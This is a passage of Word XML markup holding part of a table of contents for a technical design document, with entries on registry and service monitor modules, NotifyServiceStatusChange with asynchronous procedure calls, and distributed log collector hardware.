          <w:hyperlink w:anchor="_Toc484962996" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Registry Monitor Architecture</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962996 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962997" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Registry Monitor Workflow</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962997 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962998" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Identifying Registry Change</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962998 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962999" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service Monitor Module</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962999 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963000" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service Monitor Architecture</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963000 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963001" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service Monitor Workflows</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963001 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963002" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.3</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NotifyServiceStatusChange and Asynchronous Procedure Calls</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963002 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963003" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Distributed Log Collector Hardware (2/6)</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963003 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963004" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Log Collector Hardware architecture</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963004 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963005" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Distributed Log Collector Hardware workflows</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963005 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963006" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.3</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DLCH Server</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963006 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
